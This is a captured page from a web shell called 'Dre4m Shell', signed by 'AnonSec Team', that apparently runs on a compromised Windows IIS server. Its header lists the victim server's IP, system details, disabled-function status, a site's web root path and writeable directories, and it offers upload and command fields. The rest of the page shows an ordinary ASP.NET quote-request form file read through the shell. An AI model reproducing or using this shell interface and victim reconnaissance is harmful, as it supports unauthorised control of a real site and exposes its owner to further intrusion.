Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 18.219.47.239
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/synergyw/synergywebfront.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/synergyw/synergywebfront.com/wwwroot/Order.aspx
<%@ page title="" language="VB" masterpagefile="~/MasterPage.master" autoeventwireup="false" inherits="Order, App_Web_oosnuoys" %>

<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">
</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server">

    <span class="PageTitle">REQUEST FOR QUOTATION</span>
    
    <br /><br />
    
    
    <table>
    
        <tr>
            <td>Company Name</td>
            <td>
                <asp:TextBox ID="txtCompany" runat="server"></asp:TextBox>
                <asp:RequiredFieldValidator ID="rfvCompany" ControlToValidate="txtCompany" runat="server" ErrorMessage="Required"></asp:RequiredFieldValidator>
            </td>
        </tr>
        <tr>
            <td>Contact Name</td>
            <td>
                <asp:TextBox ID="txtContact" runat="server"></asp:TextBox>
                <asp:RequiredFieldValidator ID="rfvContact" ControlToValidate="txtContact" runat="server" ErrorMessage="Required"></asp:RequiredFieldValidator>
            </td>
        </tr>
        <tr>
            <td>Business Location</td>
            <td>
                <asp:TextBox ID="txtLocation" runat="server"></asp:TextBox>
            </td>
        </tr>
        <tr>
            <td>Email Address</td>
            <td>
                <asp:TextBox ID="txtEmail" runat="server"></asp:TextBox>
                <asp:RequiredFieldValidator ID="rfvEmail" ControlToValidate="txtEmail" runat="server" ErrorMessage="Required"></asp:RequiredFieldValidator>
                <asp:RegularExpressionValidator ID="revEmail" runat="server" ControlToValidate="txtEmail" Text="Invalid Email Address"    ValidationExpression="\w+([-+.']\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*"   ErrorMessage="Invalid Email Address"></asp:RegularExpressionValidator>
            </td>
        </tr>
        
        <tr>
            <td>Confirm Email</td>
            <td>
                <asp:TextBox ID="txtConfirm" runat="server"></asp:TextBox>
                <asp:RequiredFieldValidator ID="rfvConfirm" ControlToValidate="txtConfirm" runat="server" ErrorMessage="Required"></asp:RequiredFieldValidator>
                <asp:CompareValidator ID="cvConfirm" runat="server" ControlToCompare="txtEmail" ControlToValidate="txtConfirm" ErrorMessage="Confirmation Email not match"></asp:CompareValidator>
            </td>
        </tr>        
        
        <tr>
            <td>Product</td>
            <td>
                <asp:DropDownList ID="ddlProduct" runat="server">
                    <asp:ListItem Value="1">Synergy Accounting</asp:ListItem>
                </asp:DropDownList>
                <asp:RequiredFieldValidator ID="RequiredFieldValidator1" ControlToValidate="txtConfirm" runat="server" ErrorMessage="Required"></asp:RequiredFieldValidator>
            </td>
        </tr>        
        
        <tr>
            <td>Number of network users</td>
            <td>
                <asp:DropDownList ID="ddlUser" runat="server">
                    <asp:ListItem Value="1">1</asp:ListItem>
                    <asp:ListItem Value="2">2</asp:ListItem>
                    <asp:ListItem Value="3">3</asp:ListItem>
                    <asp:ListItem Value="4">4</asp:ListItem>
                    <asp:ListItem Value="5">5</asp:ListItem>
                    <asp:ListItem Value="6">6</asp:ListItem>
                    <asp:ListItem Value="7">7</asp:ListItem>
                    <asp:ListItem Value="8">8</asp:ListItem>
                    <asp:ListItem Value="9">9</asp:ListItem>
                    <asp:ListItem Value="10">10</asp:ListItem>
                    <asp:ListItem Value="11">11</asp:ListItem>
                    <asp:ListItem Value="12">12</asp:ListItem>
                    <asp:ListItem Value="13">13</asp:ListItem>
                    <asp:ListItem Value="14">14</asp:ListItem>
                    <asp:ListItem Value="15">15</asp:ListItem>
                    <asp:ListItem Value="16">16</asp:ListItem>
                    <asp:ListItem Value="17">17</asp:ListItem>
                    <asp:ListItem Value="18">18</asp:ListItem>
                    <asp:ListItem Value="19">19</asp:ListItem>
                    <asp:ListItem Value="20">20</asp:ListItem>
                </asp:DropDownList>
            </td>
        </tr>        


        <tr>
            <td>Comment</td>
            <td>
                <asp:TextBox ID="txtComment" Rows="5" TextMode="MultiLine" Width="300px" runat="server"></asp:TextBox>
            </td>
        </tr>       
        
    </table>

    <br />
    <asp:Button ID="btnSubmit" Text="Submit" runat="server" />
</asp:Content>


Anon7 - 2022
AnonSec Team